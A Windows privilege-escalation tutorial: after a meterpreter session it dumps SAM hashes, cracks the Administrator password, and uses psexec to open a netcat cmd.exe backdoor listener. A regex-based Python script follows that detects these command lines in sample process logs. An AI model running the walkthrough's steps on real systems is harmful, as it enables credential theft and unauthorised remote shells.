Privilege escalation


Steps:
------
(after connecting to the remote computer with the win32_reverse_meterpreter payload)
1) Load the file system library, SAM library, and process library
ex. use -m Fs
    use -m Sam
    use -m Process
2) Get the Windows password hash file
ex. gethashes
(gethashes is part of the SAM library)
3) Crack the Admin's hash with John the Ripper
ex. john /tmp/dump-01.txt
4) Upload Netcat, Psexec, and whoami. Netcat is a useful program for setting up a backdoor on a computer. Psexec lets you select which user a program runs under. Whoami just tells you which user you are logged in as.
ex. upload /tmp/nc.exe c:
    upload /tmp/psexec.exe c:
    upload /tmp/whoami.exe c:
5) Run a Netcat server under the Admin's account!
ex. psexec.exe \\127.0.0.1 -u Administrator -p hacker c:\nc.exe -L -d -e cmd.exe -p 6969
6) Telnet into the Netcat server and you now have admin access!!!
ex. Telnet 192.168.0.6 6969
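
Seen from the defender's side, steps 4 to 6 leave distinctive process command lines behind. The following is an added example, not part of the original post: it flags those command lines in process-creation records. The record fields, rule names, host names and sample events are constructed for illustration.

```python
import re

# Constructed process-creation records (fields modelled on what Windows event
# 4688 or Sysmon event 1 provide); sample data, not real logs.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "WS01\\bob", "cmdline":
     r"psexec.exe \\127.0.0.1 -u Administrator -p hacker c:\nc.exe -L -d -e cmd.exe -p 6969"},
    {"host": "WS01", "user": "WS01\\Administrator", "cmdline":
     r"c:\nc.exe -L -d -e cmd.exe -p 6969"},
    {"host": "WS02", "user": "WS02\\alice", "cmdline":
     r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt"},
    {"host": "WS03", "user": "WS03\\svc", "cmdline": r"C:\Tools\whoami.exe"},
]

# Rule names are hypothetical; each pattern targets one trait of steps 4-5.
RULES = [
    ("psexec_explicit_credentials",   # -u/-p exposes a password on the command line
     re.compile(r"\bpsexec(64)?(\.exe)?\b.*\s-u\s+\S+.*\s-p\s+\S+", re.I)),
    ("psexec_loopback_target",        # PsExec pointed back at the local machine
     re.compile(r"\bpsexec(64)?(\.exe)?\b\s+\\\\(127\.0\.0\.1|localhost)\b", re.I)),
    ("netcat_shell_listener",         # netcat binding a command interpreter
     re.compile(r"\bnc(at)?(\.exe)?\b.*\s-e\s+(cmd|powershell)(\.exe)?\b", re.I)),
    ("tool_in_drive_root",            # tools dropped directly into a drive root
     re.compile(r"(^|\s)[a-z]:\\(nc|psexec|whoami)\.exe\b", re.I)),
]

# Keep the cleartext password out of the alert store.
REDACT = re.compile(r"(-u\s+\S+\s+-p\s+)\S+", re.I)

def detect(events):
    """Return one alert per event that matches at least one rule."""
    alerts = []
    for ev in events:
        hits = [name for name, rx in RULES if rx.search(ev["cmdline"])]
        if hits:
            alerts.append({
                "host": ev["host"], "user": ev["user"], "rules": hits,
                "cmdline": REDACT.sub(r"\g<1><redacted>", ev["cmdline"]),
            })
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Command-line matching only works where process-creation auditing records the command line, and a renamed binary slips past name-based patterns, so treat these rules as one signal alongside listener and logon telemetry.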